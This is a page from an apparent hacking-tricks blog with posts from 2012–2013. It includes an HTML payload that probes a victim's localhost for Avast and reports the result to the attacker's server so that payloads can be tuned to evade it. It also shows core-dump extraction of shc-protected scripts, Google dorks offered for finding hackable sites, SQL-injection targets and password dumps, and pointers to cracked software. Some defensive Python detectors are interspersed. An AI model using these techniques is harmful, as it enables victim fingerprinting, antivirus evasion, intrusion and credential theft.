Showing posts with label TRICK. Show all posts

Monday, October 14, 2013

How to detect Avast Antivirus remotely?

During an assessment, if you know which antivirus the client uses, you have won half the battle, because you can download a trial version of that AV, install it in VirtualBox and try to bypass it, so that during the real assessment your payload or binary does not get caught. Today we are going to try to detect whether a client has Avast installed.

The original video is posted here. Avast has a site-blocking feature: to block a site, you put its address in the block URL section of the Avast interface. When someone loads that site, they get the response shown in the image below.


In the image above you can see the Avast logo, whose address is localhost:12080/$$avast-webshield$$/image001.png. So if Avast is installed on the client machine, that image is also served at that address; by checking whether the image exists, we can tell whether Avast is installed.

For this, the victim has to visit our link, where we check for the image. I am going to use my Apache server, where I put three HTML pages. One is the link we send to the victim; if the image exists it redirects to a second document, and if the image does not exist it redirects to the third HTML page.

(1) Make a blank HTML page, name it avst.html, and put the following code in it.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(2) Now make a second HTML page, name it ntavst.html, and put the same code in it.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(3) Make the third and final HTML page, name it exp.html, and put the following code in it.

<img src="http://127.0.0.1:12080/$$avast-webshield$$/image001.png" onload="document.location='http://180.215.198.150/avst.html'" onerror="document.location='http://180.215.198.150/ntavst.html'" />

Note: change the IP address in the code above to your own.

Now put all these documents in the /var/www/ folder and send the link to exp.html to the victim.

If Avast is installed, the browser is redirected to avst.html and finally to google.com; if it is not installed, the browser is redirected to ntavst.html and then to google.com.

Now check the Apache access log under /var/log/apache2/; there you can see whether avst.html or ntavst.html was visited.

PS: You can use Cobalt Strike's System Profiler, which gets you the OS version, browser details, Java version, Adobe Reader version and Flash version.
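From the defending side, the same pattern is easy to recognise in page content passing through a web proxy or mail gateway: an element that loads a loopback URL and reacts to the load or error outcome. The scanner below is an added example, not code from the original post; the sample pages and the host name collector.example are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import ipaddress

URL_ATTRS = {"src", "href", "data", "poster"}   # attributes that trigger a fetch
ORACLE_ATTRS = {"onload", "onerror"}            # handlers that leak the outcome


def is_loopback(url):
    """True when the URL points at localhost or a loopback IP literal."""
    try:
        host = urlsplit(url).hostname
    except ValueError:                # malformed authority, e.g. "http://[bad"
        return False
    if not host:
        return False                  # relative URL: same origin, not a probe
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False                  # ordinary DNS name


class LoopbackProbeFinder(HTMLParser):
    """Collects elements that load a loopback URL, noting load/error handlers."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        urls = [v for k, v in attrs.items() if k in URL_ATTRS and is_loopback(v)]
        if not urls:
            return
        handlers = sorted(k for k in attrs if k in ORACLE_ATTRS)
        self.findings.append({
            "tag": tag,
            "url": urls[0],
            "handlers": handlers,
            # A handler pair turns a plain local reference into a yes/no oracle.
            "severity": "high" if handlers else "medium",
        })


def scan_html(document):
    """Return one finding per element that references a loopback resource."""
    finder = LoopbackProbeFinder()
    finder.feed(document)
    finder.close()
    return finder.findings


# Constructed samples. PROBE_PAGE mirrors the pattern in the post; the redirect
# host is a placeholder.
PROBE_PAGE = """<html><body>
<img src="http://127.0.0.1:12080/$$avast-webshield$$/image001.png"
     onload="document.location='http://collector.example/avst.html'"
     onerror="document.location='http://collector.example/ntavst.html'" />
</body></html>"""
BENIGN_PAGE = '<html><body><img src="/static/logo.png" onerror="this.hidden=true"></body></html>'

if __name__ == "__main__":
    for name, page in (("probe", PROBE_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_html(page))
```

A "medium" finding (loopback reference without handlers) is common on developer pages, so alerting only on "high" keeps the noise down.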

Sunday, August 25, 2013

How to get plain text source from shc compiled bash script?

Shc is used to protect your shell script from modification or inspection. If you have created a bash script and want to distribute it, but don't want it to be easily readable by other people, then you can use it.

First, let's see how to compile a bash script to a binary.


wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz

tar -xvzf shc-3.8.7.tgz

cd shc-3.8.7

make

./shc

You can see the shc usage message.
shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script

Now we have a script which we want to convert to a binary.

./shc -f /script_path

You can see that it converts the plain-text bash source into a binary with the extension .sh.x.


How to retrieve plain text from binary?


The shc-compiled binary decrypts the script and loads it into memory when started. So right after we start the binary, we just segfault it and retrieve our script from the core dump.


Core dumps are often used to debug errors in Linux or UNIX programs. A core file is generated when an application terminates abnormally due to a bug, an operating system security protection scheme, or because the program simply tried to write beyond the area of memory it had allocated.

By default, most Linux distributions turn off core file creation, so we need to turn it on.

ulimit -c

If the output is zero, no core file is created.

Now we set the core file size limit to 70000 bytes:

ulimit -c 70000

Now we start the binary and segfault it right away. I used the IP-Digger binary to get the plain text from it.

./IP-Digger4.sh.x&  ( sleep 0.02 && kill -SIGSEGV $! )

 sleep 0.02 will give the binary enough time to start up and decrypt the original script. The variable $! contains the pid of the last background process started, so we can easily kill it with the segmentation fault signal SIGSEGV (same as kill -11 $!). 
+ segmentation fault (core dumped)  ./IP-Digger4.sh.x
cat core | strings >plain_text

Now open the plain_text file we created and find the plain-text source of the bash script. I uploaded the source code of IP-Digger here.

But if your script is too large, then adjust the core file size.

Monday, January 14, 2013

How to view USB History of Windows PC?

USBDeview is a small utility that lists all USB devices that are currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

Download USBDeview For X32 System
Download USBDeview For X64 System

You can also use USBDeview on a remote computer, as long as you log in to that computer as an admin user.

Connecting To Remote Computer
The following command-line options allow you to connect to remote computers. You must log in to the remote computer as an admin user in order to use these options.
  • /remote <\\Computer Name>
    Allows you to connect a single remote computer.
    For Example:
    USBDeview.exe /remote \\MyComp
  • /remotefile <Computers List File>
    Allows you to connect to multiple computers, and view all their USB activity in one window. The computers list file should be a simple ASCII text file with computer names separated by colon, semicolon, space, tab characters or CRLF.
    For Example:
    USBDeview.exe /remotefile "c:\temp\comp.txt"


In order to successfully get full admin access to the remote computer, read this Blog post: How to connect a remote Windows 7/Vista/XP computer with NirSoft utilities.

Connecting To external SYSTEM registry file

If you have the 'SYSTEM' registry file of external operating system, you can use the following command-line option to read the USB devices list from it: 
/regfile <SYSTEM Registry File>
For Example:
USBDeview.exe /regfile "c:\temp\regfiles\SYSTEM"
USBDeview.exe /regfile "d:\windows\system32\config\SYSTEM"
This option has some limitations:
  • You cannot read a Registry file of Windows XP/2003/Vista from Windows 2000 Machine.
  • USBDeview works in read-only mode. (You cannot uninstall a device from external file)

Thursday, November 15, 2012

How to find person through his email-address?


If you get an email from an unknown person and, before replying, you want to find a little information about that person, then you need a reverse email-address lookup. Or if someone abuses you and you want to trace that person, you should use a reverse email-address lookup.
If the person has a website or has listed the account on any public website, then you can find information about them using a search engine. But in most cases, people use a fake email address for communication.

(1) If the person uses a desktop client (like Outlook, Evolution Mail, etc.) to send email, then you can trace their IP from the email. But if they send from a browser, then you get the location of their email provider. For example, if a person sends email from Gmail through a web browser, then you get the location of a Gmail server.

Open the header of the email message and look for lines that say “Received: from” followed by an IP address in square brackets. If there are multiple entries, use the IP address mentioned in the last entry.
Now paste the IP address in this trace route tool and you should get a fairly good idea about the location of the email sender.




(2) Try an email search with Facebook. Facebook is the largest social website nowadays; if the person registered an account with that email, you can find the profile by searching for the email address on Facebook. Put the email address in the Facebook search box.

(3) If the email address of the sender is something like nirav_91@hotmail.com, there's a probability that he or she has created accounts on other social networks using the same alias "nirav_91"; put that in knowem.com to confirm.

(4) Finally, if nothing works, you should try a people search service like Pipl or Spokeo. Both services let you perform reverse email lookups, but Spokeo has a more comprehensive database than Pipl. (Some information in Spokeo needs a subscription.)

Other than regular web documents, Spokeo also scans social networks and even the whois information of domain names to find any bit of information associated with an email address.
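The header check from step (1), as an added example that is not part of the original post: it reads every "Received: from" header, pulls the bracketed IP out of each, and returns the one from the last entry. It goes slightly beyond the text by marking private or loopback addresses, which a desktop client behind NAT will often produce. The sample message and its addresses are constructed; note that any Received header added before your own mail server is supplied by the sending side and can be forged.

```python
import email
import ipaddress
import re
from email import policy

# Bracketed IPv4/IPv6 literal, as MTAs write it in "Received: from ... [ip]".
BRACKETED_IP = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f:.]+)\]")
# Ranges that never identify a host on the Internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


def received_hops(raw_message):
    """Return one dict per 'Received: from' header, newest (top) first."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(str(value).split())        # unfold continuation lines
        if not text.lower().startswith("from "):
            continue                               # e.g. "Received: by ..."
        # Only the part before " by " describes the sending side.
        from_clause = re.split(r"\sby\s", text, maxsplit=1)[0]
        ip = None
        for candidate in BRACKETED_IP.findall(from_clause):
            try:
                ip = ipaddress.ip_address(candidate)
            except ValueError:
                continue                           # bracketed text that is not an IP
        hops.append({
            "from": from_clause,
            "ip": str(ip) if ip else None,
            "internal": bool(ip) and any(ip in net for net in INTERNAL_NETS),
        })
    return hops


def sender_ip(raw_message):
    """Hop taken from the last 'Received: from' entry that carries an IP."""
    with_ip = [hop for hop in received_hops(raw_message) if hop["ip"]]
    return with_ip[-1] if with_ip else None


# Constructed sample message (documentation addresses and example domains).
SAMPLE = (
    "Received: from mx.example.org (mx.example.org [203.0.113.25])\n"
    "\tby inbound.example.com with ESMTPS id abc123;\n"
    "\tThu, 15 Nov 2012 10:02:11 +0000\n"
    "Received: from laptop (unknown [198.51.100.77])\n"
    "\tby mx.example.org with ESMTPSA id def456;\n"
    "\tThu, 15 Nov 2012 10:02:09 +0000\n"
    "From: someone@example.org\n"
    "Subject: hello\n"
    "\n"
    "body\n"
)

if __name__ == "__main__":
    for hop in received_hops(SAMPLE):
        print(hop)
    print("last entry:", sender_ip(SAMPLE))
```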


Wednesday, October 24, 2012

How to download youtube video?


There are lots of methods for downloading YouTube videos. Here I am listing some commonly used ones.

(1) It's very easy: download YouTube Downloader from here and install it. Open the software and copy and paste the video URL into it. BUT here is the problem: if your connection is lost, the download cannot be resumed.

(2) Copy the video URL from YouTube, then open http://keepvid.com or http://savevid.com and paste the video URL into the site. For this you need Java installed.

(3) This is my favourite method. No software or plugin is needed. If you want to download the following video
http://youtube.com/watch?v=Y4E9brXa6hA then just put ss at the beginning of the URL, like http://ssyoutube.com/watch?v=Y4E9brXa6hA, and copy and paste it into your browser address bar.

(4) If you have Internet Download Manager installed, it will automatically download when you start watching the video. You can download the full crack version of Internet Download Manager from here.

Friday, October 12, 2012

How to hide secret file in image?




Hello friends. Today we learn another steganography trick. In the past we learned how to hide text in Notepad. Now we learn how to hide a confidential file in an image.

Requirement
Command prompt.

Before we begin: I have one secret file named secret.pdf that I do not want other people to know about, and a picture named apple.jpg. I put both files in my personal folder named pictures.

  1. Open the command prompt.
  2. Change directory to the pictures folder in the command prompt.
  3. Compress your secret file (secret.pdf) using WinRAR.
  4. Back in the command prompt, type the following code:
    copy /b [image_filename].jpg + [rar_filename].rar nkd.jpg
    For our example the code becomes:
    copy /b apple.jpg + secret.rar nkd.jpg
    Here nkd.jpg is our new file, which contains the hidden document.
  5. Go to your pictures folder; you can see nkd.jpg.
  6. To view the original file there is nothing more to do: just open the file with WinRAR, or change the extension from jpg to rar.
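Because copy /b simply concatenates the two files, the archive sits after the point where the JPEG stream ends, and that is straightforward to detect. The checker below is an added example, not part of the original post: it walks the JPEG segments to the real end-of-image marker (rather than searching for the first FF D9, which can also occur inside an embedded thumbnail) and reports any archive signature in the bytes that follow. The sample bytes are constructed and are not a viewable picture.

```python
import struct

ARCHIVE_MAGIC = {b"Rar!\x1a\x07": "RAR", b"PK\x03\x04": "ZIP",
                 b"7z\xbc\xaf\x27\x1c": "7z"}


def jpeg_end(data):
    """Offset just past the JPEG EOI marker, or None if the stream is malformed."""
    if data[:2] != b"\xff\xd8":                   # must start with SOI
        return None
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xFF:                        # fill byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:                        # EOI: end of the image
            return pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:
            continue                              # markers without a length field
        if pos + 2 > len(data):
            return None
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        if length < 2:
            return None
        pos += length                             # skip the whole segment
        if marker == 0xDA:                        # SOS: entropy-coded data follows
            while True:
                pos = data.find(b"\xff", pos)
                if pos < 0 or pos + 1 >= len(data):
                    return None
                nxt = data[pos + 1]
                if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:
                    pos += 2                      # stuffed byte or restart marker
                elif nxt == 0xFF:
                    pos += 1
                else:
                    break                         # a real marker; resume outer loop
    return None


def appended_payload(data):
    """Describe bytes found after the JPEG image, or None if there are none."""
    end = jpeg_end(data)
    if end is None or end == len(data):
        return None
    trailing = data[end:]
    hits = [(trailing.find(m), kind) for m, kind in ARCHIVE_MAGIC.items()
            if m in trailing]
    offset, kind = min(hits) if hits else (None, None)
    return {"jpeg_end": end, "trailing_bytes": len(trailing), "archive": kind,
            "offset": None if offset is None else end + offset}


# Constructed sample: SOI, an APP1 segment whose payload contains FF D9,
# a scan with a stuffed FF 00 byte, then EOI.
_APP1_PAYLOAD = b"thumb\xff\xd9"
CLEAN_JPEG = (b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", 2 + len(_APP1_PAYLOAD))
              + _APP1_PAYLOAD + b"\xff\xda" + struct.pack(">H", 2)
              + b"\x12\xff\x00\x34" + b"\xff\xd9")
CARRIER = CLEAN_JPEG + b"Rar!\x1a\x07\x00" + b"constructed archive body"

if __name__ == "__main__":
    print(appended_payload(CLEAN_JPEG))
    print(appended_payload(CARRIER))
```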

Saturday, October 6, 2012

How to enable right click in web-site?

Why Is Right Click Disabled?

Right clicking your mouse can be very useful when surfing the web. It allows you to save images on webpages to your hard disk, to view the source of a particular webpage, to download background music from a blog (when the website code isn't complicated), and much more.
Nowadays, many websites and blogs don't allow you to right click on their pages. I studied HTML and basic web designing, so I like to look at webpages' HTML code when I find a new interesting website. And it makes me angry to find out that I can't right click. But as you know, there is always a way to get around something.
Just follow this step.


Go to your browser's options and disable JavaScript, then reload the site. Now you can right click on the website or blog.

Thursday, October 4, 2012

How To Hide Text in Notepad?


Steganography is the art of writing hidden messages so that no one can suspect the existence of the message. The meaning of Steganography is Concealed Writing, and that is what we are going to do. We are going to learn how to write hidden text in the Microsoft Windows text editor Notepad. We should learn this technique so that we can easily hide our personal information on a computer without any password-protecting tools, which are paid tools; yes, we have to pay to use those tools to protect our text data from unauthorized users. So below I describe how to hide text data in Notepad.
How to Hide Text in Notepad?
It is very easy; we just have to do a few steps to hide our text in Notepad. So let's start this tutorial.
1. The first thing you need to do is open Command Prompt from your Windows. I hope you know how to open it.
2. Then go to your desired location: if you want to go to another drive, type D: and press Enter; then, if you want to change directory within that drive, type cd directory/directory, replacing directory/directory with your directory names. Hopefully you have now reached your desired location in Command Prompt.
3. Now, in cmd, type notepad filename.txt:hidden and press Enter. A pop-up will ask whether you want to create this file; just press Yes, and you will see a Notepad file where you can type anything and save it.

This makes a file named filename.txt in the location you are using in Command Prompt. Now try to open that file from your drive: you will see that there is no text in it, although we typed some in when we first created it. Now the question is how to see our hidden text. It is very easy and simple: just repeat the same steps. Open Command Prompt, type your drive, go to the location where the file is saved, then type notepad filename.txt:hidden to open the hidden text. If you want to change it, type something new and save the file from the File menu. Remember that you can use any name instead of filename.txt; I just used it for this tutorial.

Saturday, September 29, 2012

Redirect Site to Another Site


A simple text file edit makes a site redirect to another. When you type an address in the address bar of any browser and press Enter, it will display another web page. For example, when you type Google.com you will be redirected to yahoo.com.

Instructions:

1) Go to this directory: c:\windows\system32\drivers\etc (the directory may change according to the drive used for the OS installation)
2) Then hit Enter
3) Find a file named "hosts"
4) Right click on it and open it with WordPad
5) On the last line of the document, type the IP* address of yahoo, a space, then www.Google.com (vice versa for other sites)
6) Now save it
7) Restart the browser if it is already running
8) Now try it; it works perfectly

IP*: to find the IP address of that website, go to Start -> Run, type cmd and press Enter. Now you have a new window on the desktop. In it, type this without quotes: "ping www.yahoo.com"
Replace yahoo.com with your preferred site and then press Enter.
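Since the same edit is a common way for malware to redirect traffic, it is worth auditing the hosts file for it. The check below is an added example, not part of the original post: it parses hosts-file text and lists every fully qualified public name that has been pinned to a routable or private address. The sample file content, the list of local suffixes and the address 203.0.113.80 are constructed assumptions.

```python
import ipaddress

# Suffixes treated as internal naming rather than overrides (assumption).
LOCAL_SUFFIXES = (".local", ".localhost", ".lan", ".internal")


def parse_hosts(text):
    """Yield (line_number, ip, hostname) for every mapping in hosts-file text."""
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split("#", 1)[0].split()     # drop comments, split columns
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                               # first column is not an IP
        for name in fields[1:]:                    # one line may list aliases
            yield lineno, ip, name.lower().rstrip(".")


def overridden_domains(text):
    """Mappings that send a public-looking name to a specific address."""
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if "." not in name or name.endswith(LOCAL_SUFFIXES):
            continue                               # localhost, single-label, LAN names
        if ip.is_loopback or ip.is_unspecified:
            continue                               # sinkhole entry: blocks, does not redirect
        findings.append((lineno, str(ip), name))
    return findings


# Constructed sample; the last line reproduces the edit described in the post.
SAMPLE_HOSTS = "\n".join([
    "# constructed sample hosts file",
    "127.0.0.1       localhost",
    "::1             localhost",
    "0.0.0.0         ads.example.net",
    "192.168.1.20    fileserver.lan",
    "203.0.113.80    www.google.com   # stands in for the other site's IP",
])

if __name__ == "__main__":
    for lineno, ip, name in overridden_domains(SAMPLE_HOSTS):
        print(f"line {lineno}: {name} -> {ip}")
```

On a live Windows system the text to audit is the content of the hosts file in the directory named in step 1.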

Friday, September 7, 2012

google hack trick

Ok, today I will show a Google hack demonstration you've never seen before.
You will never find these fucking Google hack codes on the internet.
Just watch and learn what I have discovered!!!

Ok it's time to show the secrets.

and this is the best google hack codes.



I can make and combine any text and make Google dorks from JavaScript,
from fucking HTML, CSS, jQuery, MooTools and so on really fast, and find
anything on this fucking lol g**gle !!!

I can bet you will watch and not understand what the fucking hell I'm doing.

Just sit down,drink some coffee and watch.

This is just a demonstration.

OK, first I will show how to find any hacker forums or sites, it doesn't matter!
I mean professional hackers!

Just read it all, because if you don't you will not understand these
codes and how they work!

Dorks:

inurl:"view.asp?page=" intext:"plymouth"

Ok, what does this code do?
This dork finds university and school sites you can hack.

inurl:"shoutbox.php" intext:"script"

with this code you can hack shoutbox or to find scripts


inurl:"index.php?act=" rapidleech

This code will find rapidleecher sites very quickly.

inurl:"index.php?act=idx"

This code will find ipb forums quickly to hack

inurl:"Photoshop.aspx" "tutorials"

This code will find photoshop tutorials

inurl: http://ftp://ftp site:.com

This code will find any ftp servers and root any protected sites.

allinurl:user_index.jsp

This code will find any free hosting

powered by vbulletin games 3.8.4 inurl:member.php?u=1

This code will find any vbulletin game forums and admin page.

powered by vbulletin 4.0.3 Debug Information

This code will show all vbulletin forums php codes and information
and their bugs you root into it.

powered by vbulletin "warez"

This code will find any warez forum.

video to mp3 converter online intext:"mp3"-intext:"High Quality"

With this code you can download mp3 from youtube very quickly.

intext:"Warning: mysql_fetch_array()"

With this code you will find any vulnerable sites and hack them.

inurl:radioandtv.php

This code will show all torrents hidden radios stations.

inurl:"posting.php?mode=s milies" "phpbb"

With this code you will be able to hack phpbb forums and put xss inside forum.

allinurl:tools/spider-view.php

With this code you can find site links very quickly.

embed src=".mp3" type=audio/mpeg

Html injection code to find secret sites with html mp3 embed code
you will see it even on google.

"powered by vbulletin" + "account dumps"

With this code you will be able find passwords
for any sites,forums not for porn.

allinurl:"guestbook/smileys.php"
inurl:"smileys.php" + "talking"
allinurl:smiliehelp.php

Talking smilies.

"intitle:index of" admin/FCKeditor/_samples/html

With this code you will be able to find fck server html
editors and hack them.

owl city fireflies + "instrumental"

With this code you will be able to find any mp3 instrumental; just change
owl city fireflies.

HTTP/1.1 :: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3)
access_log

with this code you will be able to hack sites access
logs and see all information.

"sql google scanner" + "php"

Google sql injection online hack vulnerable sites,forums
and find vulnerables sites very easy.

site:youtube.com *@gmail.com

This will find any youtube or any site emails.

allinurl:html_colors.html

This will find very quickly html chart codes.

private torrent + "open sign up"

This will find any private torrent open to register.


hotfile + mediafire + "http://" + "rar" horror 2010 dvdrip,
(hotfile|mediafire).rar 2010 horror dvdrip

This will find any secret sites with dvdrip movies just change horror.

dvdrip 400mb "2010"

This will find the latest ripped dvdrip movies in 400mb.

sql injection dork bank

This will find bank dorks for hacking google.

inurl:archive/index.php "visual basic"

This will find secret forums directory where you will see all information.

powered by vbulletin hacking zone
powered by vbulletin hackerz showoff

This will find hacker zone sites,forums.

--
This is video

http://www.youtube.com/watch?v=CYUrGRd7Q9M

Saturday, August 11, 2012

HOW TO UNLOCK FOLDER WHICH IS LOCKED BY SOME SOFTWARE???


FOR THIS PURPOSE YOU ONLY NEED IS WINZIP OR ANY OTHER COMPRESSION SOFTWARE.

(1) A folder which is locked is sometimes also hidden by that software. So first enable the show hidden files option under Organise > Folder options.
(2) Now you can see the locked folder. When you try to open it, it will not open. Now right click on the folder and choose add to "folder name".rar. I mean, if your folder name is lock, then right click on lock and click add to "lock".rar.
(3) Now everything is done. Open your compressed folder; it will open. If it does not open, then go to a subfolder and do it again.

If this does not work, then I am sorry. Keep googling it.

how to download from mediafire site?

All Mediafire.com Downloads:

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Amediafire.com

Apps Downloads on Mediafire.com:

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+OR+.zip+site%3Amediafire.com&btnG=Search

Movies Download on Mediafire.com:

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+.mpeg+site%3Amediafire.com&btnG=Search

1) www.mediafiresearch.net Like any other MediaFire search website, this site has options to search files on MediaFire, Rapidshare.com, Hotfile.com, Filesonic.com and many other popular file uploading sites. It also lists the last 100 searches made on the website in the form of links; you might like some of them.

2)www.shufs.com This is a very decent search engine for MediaFire with options to search files on Megaupload, Rapidshare, Bodango, and Zshare as well.

3)www.uvrx.com/mediafire.html UVRX uses Google custom search engine in order to find files from MediaFire. Type the keywords and it will fetch you the best possible results using the Google Search algorithm.

4)www.searchshared.com/mediafire.com This MediaFire Search engine site has been shared over 1783 Facebook fans and by the looks of it seems quite popular.

5) www.jqd.org JQD supports Rapidshare, Megaupload, MediaFire, SendSpace, Gigasize, ADrive, Zshare, Depositfiles, Netload, Bodango, Megashares and FileFactory, and you can also use it to search for Torrents online. If you want to try a cool file uploading site then check out 4Shared.com, we are sure you will love it. Anyway, do let us know if you frequently use Mediafire.com search for all your downloading needs. Also share it with your buddies so that they can make use of all these Mediafire Search websites!